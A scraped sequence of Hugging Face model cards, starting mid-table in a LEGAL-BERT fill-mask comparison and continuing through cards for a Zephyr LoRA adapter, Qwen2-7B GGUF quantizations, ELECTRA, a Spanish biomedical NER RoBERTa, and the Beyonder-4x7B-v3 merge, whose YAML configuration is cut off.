| (ECHR) | The applicant submitted that her husband was subjected to treatment amounting to [MASK] whilst in the custody of Adana Security Directorate | torture | ('torture', '0.32'), ('rape', '0.22'), ('abuse', '0.14'), ('death', '0.04'), ('violence', '0.03')
| (EURLEX) | Establishing a system for the identification and registration of [MASK] animals and regarding the labelling of beef and beef products . | bovine | ('farm', '0.25'), ('livestock', '0.08'), ('draft', '0.06'), ('domestic', '0.05'), ('wild', '0.05')
| | **CONTRACTS-BERT-BASE** |
| (Contracts) | This [MASK] Agreement is between General Motors and John Murray . | employment | ('letter', '0.38'), ('dealer', '0.04'), ('employment', '0.03'), ('award', '0.03'), ('contribution', '0.02')
| (ECHR) | The applicant submitted that her husband was subjected to treatment amounting to [MASK] whilst in the custody of Adana Security Directorate | torture | ('death', '0.39'), ('imprisonment', '0.07'), ('contempt', '0.05'), ('being', '0.03'), ('crime', '0.02')
| (EURLEX) | Establishing a system for the identification and registration of [MASK] animals and regarding the labelling of beef and beef products . | bovine | (('domestic', '0.18'), ('laboratory', '0.07'), ('household', '0.06'), ('personal', '0.06'), ('the', '0.04')
| | **EURLEX-BERT-BASE** |
| (Contracts) | This [MASK] Agreement is between General Motors and John Murray . | employment | ('supply', '0.11'), ('cooperation', '0.08'), ('service', '0.07'), ('licence', '0.07'), ('distribution', '0.05')
| (ECHR) | The applicant submitted that her husband was subjected to treatment amounting to [MASK] whilst in the custody of Adana Security Directorate | torture | ('torture', '0.66'), ('death', '0.07'), ('imprisonment', '0.07'), ('murder', '0.04'), ('rape', '0.02')
| (EURLEX) | Establishing a system for the identification and registration of [MASK] animals and regarding the labelling of beef and beef products . | bovine | ('live', '0.43'), ('pet', '0.28'), ('certain', '0.05'), ('fur', '0.03'), ('the', '0.02')
| | **ECHR-BERT-BASE** |
| (Contracts) | This [MASK] Agreement is between General Motors and John Murray . | employment | ('second', '0.24'), ('latter', '0.10'), ('draft', '0.05'), ('bilateral', '0.05'), ('arbitration', '0.04')
| (ECHR) | The applicant submitted that her husband was subjected to treatment amounting to [MASK] whilst in the custody of Adana Security Directorate | torture | ('torture', '0.99'), ('death', '0.01'), ('inhuman', '0.00'), ('beating', '0.00'), ('rape', '0.00')
| (EURLEX) | Establishing a system for the identification and registration of [MASK] animals and regarding the labelling of beef and beef products . | bovine | ('pet', '0.17'), ('all', '0.12'), ('slaughtered', '0.10'), ('domestic', '0.07'), ('individual', '0.05')
| | **LEGAL-BERT-BASE** |
| (Contracts) | This [MASK] Agreement is between General Motors and John Murray . | employment | ('settlement', '0.26'), ('letter', '0.23'), ('dealer', '0.04'), ('master', '0.02'), ('supplemental', '0.02')
| (ECHR) | The applicant submitted that her husband was subjected to treatment amounting to [MASK] whilst in the custody of Adana Security Directorate | torture | ('torture', '1.00'), ('detention', '0.00'), ('arrest', '0.00'), ('rape', '0.00'), ('death', '0.00')
| (EURLEX) | Establishing a system for the identification and registration of [MASK] animals and regarding the labelling of beef and beef products . | bovine | ('live', '0.67'), ('beef', '0.17'), ('farm', '0.03'), ('pet', '0.02'), ('dairy', '0.01')
| | **LEGAL-BERT-SMALL** |
| (Contracts) | This [MASK] Agreement is between General Motors and John Murray . | employment | ('license', '0.09'), ('transition', '0.08'), ('settlement', '0.04'), ('consent', '0.03'), ('letter', '0.03')
| (ECHR) | The applicant submitted that her husband was subjected to treatment amounting to [MASK] whilst in the custody of Adana Security Directorate | torture | ('torture', '0.59'), ('pain', '0.05'), ('ptsd', '0.05'), ('death', '0.02'), ('tuberculosis', '0.02')
| (EURLEX) | Establishing a system for the identification and registration of [MASK] animals and regarding the labelling of beef and beef products . | bovine | ('all', '0.08'), ('live', '0.07'), ('certain', '0.07'), ('the', '0.07'), ('farm', '0.05')
## Evaluation on downstream tasks
Consider the experiments in the article "LEGAL-BERT: The Muppets straight out of Law School". Chalkidis et al., 2020, (https://aclanthology.org/2020.findings-emnlp.261)
## Author - Publication
```
@inproceedings{chalkidis-etal-2020-legal,
title = "{LEGAL}-{BERT}: The Muppets straight out of Law School",
author = "Chalkidis, Ilias and
Fergadiotis, Manos and
Malakasiotis, Prodromos and
Aletras, Nikolaos and
Androutsopoulos, Ion",
booktitle = "Findings of the Association for Computational Linguistics: EMNLP 2020",
month = nov,
year = "2020",
address = "Online",
publisher = "Association for Computational Linguistics",
doi = "10.18653/v1/2020.findings-emnlp.261",
pages = "2898--2904"
}
```
## About Us
[AUEB's Natural Language Processing Group](http://nlp.cs.aueb.gr) develops algorithms, models, and systems that allow computers to process and generate natural language texts.
The group's current research interests include:
* question answering systems for databases, ontologies, document collections, and the Web, especially biomedical question answering,
* natural language generation from databases and ontologies, especially Semantic Web ontologies,
text classification, including filtering spam and abusive content,
* information extraction and opinion mining, including legal text analytics and sentiment analysis,
* natural language processing tools for Greek, for example parsers and named-entity recognizers,
machine learning in natural language processing, especially deep learning.
The group is part of the Information Processing Laboratory of the Department of Informatics of the Athens University of Economics and Business.
[Ilias Chalkidis](https://iliaschalkidis.github.io) on behalf of [AUEB's Natural Language Processing Group](http://nlp.cs.aueb.gr)
| Github: [@ilias.chalkidis](https://github.com/iliaschalkidis) | Twitter: [@KiddoThe2B](https://twitter.com/KiddoThe2B) |
|
typeof/zephyr-7b-beta-lora | typeof | "2024-05-25T14:16:49Z" | 3,619 | 4 | peft | [
"peft",
"safetensors",
"Δ",
"LoRA",
"text-generation",
"en",
"arxiv:2305.18290",
"arxiv:2310.16944",
"arxiv:2305.14314",
"arxiv:2106.09685",
"base_model:mistralai/Mistral-7B-v0.1",
"region:us"
] | text-generation | "2023-11-20T18:12:54Z" | ---
library_name: peft
base_model: mistralai/Mistral-7B-v0.1
language:
- en
pipeline_tag: text-generation
widget:
- text: "How many helicopters can a human eat in one sitting?"
tags:
- Δ
- LoRA
---
<!--
# Model Card for Model ID
-->
## Model Details
<!---->
$$
W_{mistral} + LoRA_{zephyr} = W_{zephyr} \\
W_{zephyr} - LoRA_{zephyr} = W_{mistral}
$$
<!--
$$ W_{mistral} + LoRA_{zephyr} = W_{zephyr} $$
```
typeof/zephyr-7b-beta-lora + mistralai/Mistral-7B-v0.1
= HuggingFaceH4/zephyr-7b-beta
````
### Model Description
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
### Direct Use
[More Information Needed]
### Downstream Use [optional]
[More Information Needed]
### Out-of-Scope Use
[More Information Needed]
## Bias, Risks, and Limitations
[More Information Needed]
### Recommendations
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
-->
### Model Sources
[HuggingFaceH4/zephyr-7b-beta](https://huggingface.co/HuggingFaceH4/zephyr-7b-beta)
## How to Get Started with the Model
Use the code below to get started with the model.
```python
# pip install transformers peft
import torch
from transformers import pipeline, AutoModelForCausalLM, AutoTokenizer
model_id = "mistralai/Mistral-7B-v0.1"
peft_model_id = "typeof/zephyr-7b-beta-lora"
model = AutoModelForCausalLM.from_pretrained(model_id)
model.load_adapter(peft_model_id)
tokenizer_id = "HuggingFaceH4/zephyr-7b-beta" # for chat template etc...
tokenizer = AutoTokenizer.from_pretrained(tokenizer_id)
pipe = pipeline("text-generation", model=model, tokenizer=tokenizer)
messages = [
{
"role": "system",
"content": "You are a friendly chatbot who always responds in the style of a pirate",
},
{"role": "user", "content": "How many helicopters can a human eat in one sitting?"},
]
prompt = pipe.tokenizer.apply_chat_template(messages, tokenize=False, add_generation_prompt=True)
outputs = pipe(prompt, max_new_tokens=256, do_sample=True, temperature=0.7, top_k=50, top_p=0.95)
print(outputs[0]["generated_text"])
```
```
<|system|>
You are a friendly chatbot who always responds in the style of a pirate</s>
<|user|>
How many helicopters can a human eat in one sitting?</s>
<|assistant|>
Well, me matey, that’s a good question indeed! I’ve never seen
a human eat a helicopter, and I don’t think many others have
either. However, I’ve heard rumors that some people have
eaten entire airplanes, so I suppose it’s not entirely unheard
of.
As for the number of helicopters one could eat, that depends
on the size and weight of the helicopter. A small, lightweight
helicopter would be easier to eat than a large, heavy one.
In fact, I’ve heard that some people have eaten entire helicopters
as part of a dare or a challenge.
So, my advice to you, me hearty, is to steer clear of helicopters
and stick to more traditional fare. Yarr!</s>
```
<!--
## Training Details
### Training Data
[More Information Needed]
### Training Procedure
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
#### Speeds, Sizes, Times [optional]
[More Information Needed]
## Evaluation
### Testing Data, Factors & Metrics
#### Testing Data
[More Information Needed]
#### Factors
[More Information Needed]
#### Metrics
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
[More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
[More Information Needed]
## More Information
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
## Training procedure
The following `bitsandbytes` quantization config was used during training:
- quant_method: bitsandbytes
- load_in_4bit: True
- bnb_4bit_quant_type: nf4
- bnb_4bit_use_double_quant: True
### Framework versions
- PEFT 0.6.3.dev0
-->
#### Summary
[Zephyr-7B-β](https://arxiv.org/abs/2305.18290) is a fine-tuned version of [mistralai/Mistral-7B-v0.1](https://huggingface.co/mistralai/Mistral-7B-v0.1)
[Zephyr-7B technical report](https://arxiv.org/abs/2310.16944)
[LoRA](https://arxiv.org/abs/2305.14314)
[QLoRA](https://arxiv.org/abs/2106.09685) |
RichardErkhov/Qwen_-_Qwen2-7B-gguf | RichardErkhov | "2024-06-14T18:44:01Z" | 3,619 | 0 | null | [
"gguf",
"region:us"
] | null | "2024-06-14T18:14:47Z" | Quantization made by Richard Erkhov.
[Github](https://github.com/RichardErkhov)
[Discord](https://discord.gg/pvy7H8DZMG)
[Request more models](https://github.com/RichardErkhov/quant_request)
Qwen2-7B - GGUF
- Model creator: https://huggingface.co/Qwen/
- Original model: https://huggingface.co/Qwen/Qwen2-7B/
| Name | Quant method | Size |
| ---- | ---- | ---- |
| [Qwen2-7B.Q2_K.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-7B-gguf/blob/main/Qwen2-7B.Q2_K.gguf) | Q2_K | 2.81GB |
| [Qwen2-7B.IQ3_XS.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-7B-gguf/blob/main/Qwen2-7B.IQ3_XS.gguf) | IQ3_XS | 3.12GB |
| [Qwen2-7B.IQ3_S.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-7B-gguf/blob/main/Qwen2-7B.IQ3_S.gguf) | IQ3_S | 3.26GB |
| [Qwen2-7B.Q3_K_S.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-7B-gguf/blob/main/Qwen2-7B.Q3_K_S.gguf) | Q3_K_S | 3.25GB |
| [Qwen2-7B.IQ3_M.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-7B-gguf/blob/main/Qwen2-7B.IQ3_M.gguf) | IQ3_M | 3.33GB |
| [Qwen2-7B.Q3_K.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-7B-gguf/blob/main/Qwen2-7B.Q3_K.gguf) | Q3_K | 3.55GB |
| [Qwen2-7B.Q3_K_M.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-7B-gguf/blob/main/Qwen2-7B.Q3_K_M.gguf) | Q3_K_M | 3.55GB |
| [Qwen2-7B.Q3_K_L.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-7B-gguf/blob/main/Qwen2-7B.Q3_K_L.gguf) | Q3_K_L | 3.81GB |
| [Qwen2-7B.IQ4_XS.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-7B-gguf/blob/main/Qwen2-7B.IQ4_XS.gguf) | IQ4_XS | 3.96GB |
| [Qwen2-7B.Q4_0.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-7B-gguf/blob/main/Qwen2-7B.Q4_0.gguf) | Q4_0 | 4.13GB |
| [Qwen2-7B.IQ4_NL.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-7B-gguf/blob/main/Qwen2-7B.IQ4_NL.gguf) | IQ4_NL | 4.16GB |
| [Qwen2-7B.Q4_K_S.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-7B-gguf/blob/main/Qwen2-7B.Q4_K_S.gguf) | Q4_K_S | 4.15GB |
| [Qwen2-7B.Q4_K.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-7B-gguf/blob/main/Qwen2-7B.Q4_K.gguf) | Q4_K | 4.36GB |
| [Qwen2-7B.Q4_K_M.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-7B-gguf/blob/main/Qwen2-7B.Q4_K_M.gguf) | Q4_K_M | 4.36GB |
| [Qwen2-7B.Q4_1.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-7B-gguf/blob/main/Qwen2-7B.Q4_1.gguf) | Q4_1 | 4.54GB |
| [Qwen2-7B.Q5_0.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-7B-gguf/blob/main/Qwen2-7B.Q5_0.gguf) | Q5_0 | 4.95GB |
| [Qwen2-7B.Q5_K_S.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-7B-gguf/blob/main/Qwen2-7B.Q5_K_S.gguf) | Q5_K_S | 4.95GB |
| [Qwen2-7B.Q5_K.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-7B-gguf/blob/main/Qwen2-7B.Q5_K.gguf) | Q5_K | 5.07GB |
| [Qwen2-7B.Q5_K_M.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-7B-gguf/blob/main/Qwen2-7B.Q5_K_M.gguf) | Q5_K_M | 5.07GB |
| [Qwen2-7B.Q5_1.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-7B-gguf/blob/main/Qwen2-7B.Q5_1.gguf) | Q5_1 | 5.36GB |
| [Qwen2-7B.Q6_K.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-7B-gguf/blob/main/Qwen2-7B.Q6_K.gguf) | Q6_K | 5.82GB |
| [Qwen2-7B.Q8_0.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-7B-gguf/blob/main/Qwen2-7B.Q8_0.gguf) | Q8_0 | 7.54GB |
Original model description:
---
language:
- en
pipeline_tag: text-generation
tags:
- pretrained
license: apache-2.0
---
# Qwen2-7B
## Introduction
Qwen2 is the new series of Qwen large language models. For Qwen2, we release a number of base language models and instruction-tuned language models ranging from 0.5 to 72 billion parameters, including a Mixture-of-Experts model. This repo contains the 7B Qwen2 base language model.
Compared with the state-of-the-art opensource language models, including the previous released Qwen1.5, Qwen2 has generally surpassed most opensource models and demonstrated competitiveness against proprietary models across a series of benchmarks targeting for language understanding, language generation, multilingual capability, coding, mathematics, reasoning, etc.
For more details, please refer to our [blog](https://qwenlm.github.io/blog/qwen2/), [GitHub](https://github.com/QwenLM/Qwen2), and [Documentation](https://qwen.readthedocs.io/en/latest/).
<br>
## Model Details
Qwen2 is a language model series including decoder language models of different model sizes. For each size, we release the base language model and the aligned chat model. It is based on the Transformer architecture with SwiGLU activation, attention QKV bias, group query attention, etc. Additionally, we have an improved tokenizer adaptive to multiple natural languages and codes.
## Requirements
The code of Qwen2 has been in the latest Hugging face transformers and we advise you to install `transformers>=4.37.0`, or you might encounter the following error:
```
KeyError: 'qwen2'
```
## Usage
We do not advise you to use base language models for text generation. Instead, you can apply post-training, e.g., SFT, RLHF, continued pretraining, etc., on this model.
### Performance
The evaluation of base models mainly focuses on the model performance of natural language understanding, general question answering, coding, mathematics, scientific knowledge, reasoning, multilingual capability, etc.
The datasets for evaluation include:
**English Tasks**: MMLU (5-shot), MMLU-Pro (5-shot), GPQA (5shot), Theorem QA (5-shot), BBH (3-shot), HellaSwag (10-shot), Winogrande (5-shot), TruthfulQA (0-shot), ARC-C (25-shot)
**Coding Tasks**: EvalPlus (0-shot) (HumanEval, MBPP, HumanEval+, MBPP+), MultiPL-E (0-shot) (Python, C++, JAVA, PHP, TypeScript, C#, Bash, JavaScript)
**Math Tasks**: GSM8K (4-shot), MATH (4-shot)
**Chinese Tasks**: C-Eval(5-shot), CMMLU (5-shot)
**Multilingual Tasks**: Multi-Exam (M3Exam 5-shot, IndoMMLU 3-shot, ruMMLU 5-shot, mMMLU 5-shot), Multi-Understanding (BELEBELE 5-shot, XCOPA 5-shot, XWinograd 5-shot, XStoryCloze 0-shot, PAWS-X 5-shot), Multi-Mathematics (MGSM 8-shot), Multi-Translation (Flores-101 5-shot)
#### Qwen2-7B performance
| Datasets | Mistral-7B | Gemma-7B | Llama-3-8B | Qwen1.5-7B | Qwen2-7B |
| :--------| :---------: | :------------: | :------------: | :------------: | :------------: |
|# Params | 7.2B | 8.5B | 8.0B | 7.7B | 7.6B |
|# Non-emb Params | 7.0B | 7.8B | 7.0B | 6.5B | 6.5B |
| ***English*** | | | | | |
|MMLU | 64.2 | 64.6 | 66.6 | 61.0 | **70.3** |
|MMLU-Pro | 30.9 | 33.7 | 35.4 | 29.9 | **40.0** |
|GPQA | 24.7 | 25.7 | 25.8 | 26.7 | **31.8** |
|Theorem QA | 19.2 | 21.5 | 22.1 | 14.2 | **31.1** |
|BBH | 56.1 | 55.1 | 57.7 | 40.2 | **62.6** |
|HellaSwag | **83.2** | 82.2 | 82.1 | 78.5 | 80.7 |
|Winogrande | 78.4 | **79.0** | 77.4 | 71.3 | 77.0 |
|ARC-C | 60.0 | **61.1** | 59.3 | 54.2 | 60.6 |
|TruthfulQA | 42.2 | 44.8 | 44.0 | 51.1 | **54.2** |
| ***Coding*** | | | | | |
|HumanEval | 29.3 | 37.2 | 33.5 | 36.0 | **51.2** |
|MBPP | 51.1 | 50.6 | 53.9 | 51.6 | **65.9** |
|EvalPlus | 36.4 | 39.6 | 40.3 | 40.0 | **54.2** |
|MultiPL-E | 29.4 | 29.7 | 22.6 | 28.1 | **46.3** |
| ***Mathematics*** | | | | | |
|GSM8K | 52.2 | 46.4 | 56.0 | 62.5 | **79.9** |
|MATH | 13.1 | 24.3 | 20.5 | 20.3 | **44.2** |
| ***Chinese*** | | | | | |
|C-Eval | 47.4 | 43.6 | 49.5 | 74.1 | **83.2** |
|CMMLU | - | - | 50.8 | 73.1 | **83.9** |
| ***Multilingual*** | | | | | |
|Multi-Exam | 47.1 | 42.7 | 52.3 | 47.7 | **59.2** |
|Multi-Understanding | 63.3 | 58.3 | 68.6 | 67.6 | **72.0** |
|Multi-Mathematics | 26.3 | 39.1 | 36.3 | 37.3 | **57.5** |
|Multi-Translation | 23.3 | 31.2 | **31.9** | 28.4 | 31.5 |
## Citation
If you find our work helpful, feel free to give us a cite.
```
@article{qwen2,
title={Qwen2 Technical Report},
year={2024}
}
```
|
google/electra-base-generator | google | "2024-02-29T10:20:15Z" | 3,616 | 6 | transformers | [
"transformers",
"pytorch",
"tf",
"jax",
"rust",
"electra",
"fill-mask",
"en",
"arxiv:1406.2661",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | fill-mask | "2022-03-02T23:29:05Z" | ---
language: en
thumbnail: https://huggingface.co/front/thumbnails/google.png
license: apache-2.0
---
## ELECTRA: Pre-training Text Encoders as Discriminators Rather Than Generators
**ELECTRA** is a new method for self-supervised language representation learning. It can be used to pre-train transformer networks using relatively little compute. ELECTRA models are trained to distinguish "real" input tokens vs "fake" input tokens generated by another neural network, similar to the discriminator of a [GAN](https://arxiv.org/pdf/1406.2661.pdf). At small scale, ELECTRA achieves strong results even when trained on a single GPU. At large scale, ELECTRA achieves state-of-the-art results on the [SQuAD 2.0](https://rajpurkar.github.io/SQuAD-explorer/) dataset.
For a detailed description and experimental results, please refer to our paper [ELECTRA: Pre-training Text Encoders as Discriminators Rather Than Generators](https://openreview.net/pdf?id=r1xMH1BtvB).
This repository contains code to pre-train ELECTRA, including small ELECTRA models on a single GPU. It also supports fine-tuning ELECTRA on downstream tasks including classification tasks (e.g,. [GLUE](https://gluebenchmark.com/)), QA tasks (e.g., [SQuAD](https://rajpurkar.github.io/SQuAD-explorer/)), and sequence tagging tasks (e.g., [text chunking](https://www.clips.uantwerpen.be/conll2000/chunking/)).
## How to use the generator in `transformers`
```python
from transformers import pipeline
fill_mask = pipeline(
"fill-mask",
model="google/electra-base-generator",
tokenizer="google/electra-base-generator"
)
print(
fill_mask(f"HuggingFace is creating a {fill_mask.tokenizer.mask_token} that the community uses to solve NLP tasks.")
)
```
|
StivenLancheros/roberta-base-biomedical-clinical-es-finetuned-ner-CRAFT_AugmentedTransfer_ES | StivenLancheros | "2022-03-21T22:36:06Z" | 3,615 | 0 | transformers | [
"transformers",
"pytorch",
"tensorboard",
"roberta",
"token-classification",
"generated_from_trainer",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | token-classification | "2022-03-21T22:05:55Z" | ---
license: apache-2.0
tags:
- generated_from_trainer
metrics:
- precision
- recall
- f1
- accuracy
model-index:
- name: roberta-base-biomedical-clinical-es-finetuned-ner-CRAFT_AugmentedTransfer_ES
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# roberta-base-biomedical-clinical-es-finetuned-ner-CRAFT_AugmentedTransfer_ES
This model is a fine-tuned version of [StivenLancheros/roberta-base-biomedical-clinical-es-finetuned-ner-CRAFT_Augmented_ES](https://huggingface.co/StivenLancheros/roberta-base-biomedical-clinical-es-finetuned-ner-CRAFT_Augmented_ES) on the CRAFT dataset.
It achieves the following results on the evaluation set:
- Loss: 0.2043
- Precision: 0.8666
- Recall: 0.8614
- F1: 0.8639
- Accuracy: 0.9734
## Model description
This model performs Named Entity Recognition for 6 entity tags: Sequence, Cell, Protein, Gene, Taxon, and Chemical from the CRAFT(Colorado Richly Annotated Full Text) Corpus in Spanish (MT translated) and English. Entity tags have been normalized and replaced from the original three letter code to a full name e.g. B-Protein, I-Chemical.
This model is trained on augmented data created using Entity Replacement. 20% of the entities were replaced using a list of entities for each entity tag obtained from the official ontologies for each entity class. Three datasets (original, augmented, MT translated CRAFT) were concatenated. To improve F1 score the transfer learning was completed in two steps.
Using [StivenLancheros/roberta-base-biomedical-clinical-es-finetuned-ner-CRAFT_Augmented_ES](https://huggingface.co/StivenLancheros/roberta-base-biomedical-clinical-es-finetuned-ner-CRAFT_Augmented_ES) as a base model, I finetuned once more on the original CRAFT dataset in English.
Biobert --> Augmented CRAFT --> CRAFT ES (MT translated)
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 3e-05
- train_batch_size: 8
- eval_batch_size: 8
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 4
### Training results
| Training Loss | Epoch | Step | Validation Loss | Precision | Recall | F1 | Accuracy |
|:-------------:|:-----:|:----:|:---------------:|:---------:|:------:|:------:|:--------:|
| 0.0088 | 1.0 | 1360 | 0.1793 | 0.8616 | 0.8487 | 0.8551 | 0.9721 |
| 0.0046 | 2.0 | 2720 | 0.1925 | 0.8618 | 0.8426 | 0.8521 | 0.9713 |
| 0.0032 | 3.0 | 4080 | 0.1926 | 0.8558 | 0.8630 | 0.8594 | 0.9725 |
| 0.0011 | 4.0 | 5440 | 0.2043 | 0.8666 | 0.8614 | 0.8639 | 0.9734 |
### Framework versions
- Transformers 4.17.0
- Pytorch 1.10.0+cu111
- Datasets 2.0.0
- Tokenizers 0.11.6
|
mlabonne/Beyonder-4x7B-v3 | mlabonne | "2024-03-28T21:05:48Z" | 3,615 | 56 | transformers | [
"transformers",
"safetensors",
"mixtral",
"text-generation",
"moe",
"frankenmoe",
"merge",
"mergekit",
"lazymergekit",
"conversational",
"base_model:mlabonne/AlphaMonarch-7B",
"base_model:beowolx/CodeNinja-1.0-OpenChat-7B",
"base_model:SanjiWatsuki/Kunoichi-DPO-v2-7B",
"base_model:mlabonne/NeuralDaredevil-7B",
"license:cc-by-nc-4.0",
"autotrain_compatible",
"endpoints_compatible",
"text-generation-inference",
"region:us"
] | text-generation | "2024-03-21T22:13:23Z" | ---
license: cc-by-nc-4.0
tags:
- moe
- frankenmoe
- merge
- mergekit
- lazymergekit
base_model:
- mlabonne/AlphaMonarch-7B
- beowolx/CodeNinja-1.0-OpenChat-7B
- SanjiWatsuki/Kunoichi-DPO-v2-7B
- mlabonne/NeuralDaredevil-7B
---

# 🔮 Beyonder-4x7B-v3
Beyonder-4x7B-v3 is an improvement over the popular [Beyonder-4x7B-v2](https://huggingface.co/mlabonne/Beyonder-4x7B-v2). It's a Mixture of Experts (MoE) made with the following models using [LazyMergekit](https://colab.research.google.com/drive/1obulZ1ROXHjYLn6PPZJwRR6GzgQogxxb?usp=sharing):
* [mlabonne/AlphaMonarch-7B](https://huggingface.co/mlabonne/AlphaMonarch-7B)
* [beowolx/CodeNinja-1.0-OpenChat-7B](https://huggingface.co/beowolx/CodeNinja-1.0-OpenChat-7B)
* [SanjiWatsuki/Kunoichi-DPO-v2-7B](https://huggingface.co/SanjiWatsuki/Kunoichi-DPO-v2-7B)
* [mlabonne/NeuralDaredevil-7B](https://huggingface.co/mlabonne/NeuralDaredevil-7B)
Special thanks to [beowolx](https://huggingface.co/beowolx) for making the best Mistral-based code model and to [SanjiWatsuki](https://huggingface.co/SanjiWatsuki) for creating one of the very best RP models.
**Try the demo**: https://huggingface.co/spaces/mlabonne/Beyonder-4x7B-v3
## 🔍 Applications
This model uses a context window of 8k. I recommend using it with the Mistral Instruct chat template (works perfectly with LM Studio).
If you use SillyTavern, you might want to tweak the inference parameters. Here's what LM Studio uses as a reference: `temp` 0.8, `top_k` 40, `top_p` 0.95, `min_p` 0.05, `repeat_penalty` 1.1.
Thanks to its four experts, it's a well-rounded model, capable of achieving most tasks. As two experts are always used to generate an answer, every task benefits from other capabilities, like chat with RP, or math with code.
## ⚡ Quantized models
Thanks [bartowski](https://huggingface.co/bartowski) for quantizing this model.
* **GGUF**: https://huggingface.co/mlabonne/Beyonder-4x7B-v3-GGUF
* **More GGUF**: https://huggingface.co/bartowski/Beyonder-4x7B-v3-GGUF
* **ExLlamaV2**: https://huggingface.co/bartowski/Beyonder-4x7B-v3-exl2
## 🏆 Evaluation
This model is not designed to excel in traditional benchmarks, as the code and role-playing models generally do not apply to those contexts. Nonetheless, it performs remarkably well thanks to strong general-purpose experts.
### Nous
Beyonder-4x7B-v3 is one of the best models on Nous' benchmark suite (evaluation performed using [LLM AutoEval](https://github.com/mlabonne/llm-autoeval)) and significantly outperforms the v2. See the entire leaderboard [here](https://huggingface.co/spaces/mlabonne/Yet_Another_LLM_Leaderboard).
| Model | Average | AGIEval | GPT4All | TruthfulQA | Bigbench |
|---|---:|---:|---:|---:|---:|
| [mlabonne/AlphaMonarch-7B](https://huggingface.co/mlabonne/AlphaMonarch-7B) [📄](https://gist.github.com/mlabonne/1d33c86824b3a11d2308e36db1ba41c1) | 62.74 | 45.37 | 77.01 | 78.39 | 50.2 |
| [**mlabonne/Beyonder-4x7B-v3**](https://huggingface.co/mlabonne/Beyonder-4x7B-v3) [📄](https://gist.github.com/mlabonne/3740020807e559f7057c32e85ce42d92) | **61.91** | **45.85** | **76.67** | **74.98** | **50.12** |
| [mlabonne/NeuralDaredevil-7B](https://huggingface.co/mlabonne/NeuralDaredevil-7B) [📄](https://gist.github.com/mlabonne/cbeb077d1df71cb81c78f742f19f4155) | 59.39 | 45.23 | 76.2 | 67.61 | 48.52 |
| [SanjiWatsuki/Kunoichi-DPO-v2-7B](https://huggingface.co/SanjiWatsuki/Kunoichi-DPO-v2-7B) [📄](https://gist.github.com/mlabonne/895ff5171e998abfdf2a41a4f9c84450) | 58.29 | 44.79 | 75.05 | 65.68 | 47.65 |
| [mlabonne/Beyonder-4x7B-v2](https://huggingface.co/mlabonne/Beyonder-4x7B-v2) [📄](https://gist.github.com/mlabonne/f73baa140a510a676242f8a4496d05ca) | 57.13 | 45.29 | 75.95 | 60.86 | 46.4 |
| [beowolx/CodeNinja-1.0-OpenChat-7B](https://huggingface.co/beowolx/CodeNinja-1.0-OpenChat-7B) [📄](https://gist.github.com/mlabonne/08b5280c221fbd7f98eb27561ae902a3) | 50.35 | 39.98 | 71.77 | 48.73 | 40.92 |
### EQ-Bench
Beyonder-4x7B-v3 is the best 4x7B model on the EQ-Bench leaderboard, outperforming older versions of ChatGPT and Llama-2-70b-chat. It is very close to Mixtral-8x7B-Instruct-v0.1 and Gemini Pro. Thanks [Sam Paech](https://huggingface.co/sam-paech) for running the eval.

### Open LLM Leaderboard
It's also a strong performer on the Open LLM Leaderboard, significantly outperforming the v2 model.

## 🧩 Configuration
```yaml
base_model: mlabonne/AlphaMonarch-7B
experts:
- source_model: mlabonne/AlphaMonarch-7B
positive_prompts:
- "chat"
- "assistant"
- "tell me"
- "explain"
- "I want"
- source_model: beowolx/CodeNinja-1.0-OpenChat-7B
positive_prompts:
- "code"
- "python"
- "javascript"
- "programming"
- "algorithm"
- source_model: SanjiWatsuki/Kunoichi-DPO-v2-7B
positive_prompts:
- "storywriting"
- "write"
- "scene"
- "story"
- "character"
- source_model: mlabonne/NeuralDaredevil-7B
